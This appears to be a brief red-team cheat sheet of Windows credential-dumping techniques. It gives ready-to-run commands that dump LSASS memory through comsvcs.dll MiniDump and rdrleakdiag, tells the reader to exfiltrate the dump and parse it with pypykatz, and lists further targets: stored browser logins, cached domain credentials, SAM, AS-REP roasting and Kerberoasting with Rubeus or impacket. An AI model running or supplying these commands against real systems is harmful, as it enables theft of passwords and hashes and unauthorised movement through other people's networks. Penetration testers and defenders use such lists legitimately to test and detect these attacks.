- LSASS dump with comsvcs.dll:
- Run
tasklist and note LSASS PID
- Run
rundll32.exe comsvcs.dll,MiniDump <lsass PID> <out path> full
- Exfiltrate LSASS dump and read with
pypykatz lsa minidump lsass.dmp
- Memory dump with the Windows Resource Leak Diagnostic tool
rdrleakdiag /p [REMOVED] /o CSIDL_PROFILE\\downloads /fullmemdmp /wait 1
- Stored browser logins
- Cached Domain Credentials
- SAM
- AS-REP Roasting
- Rubeus / impacket getNPUsers
- Kerberoast
- Rubeus / impacket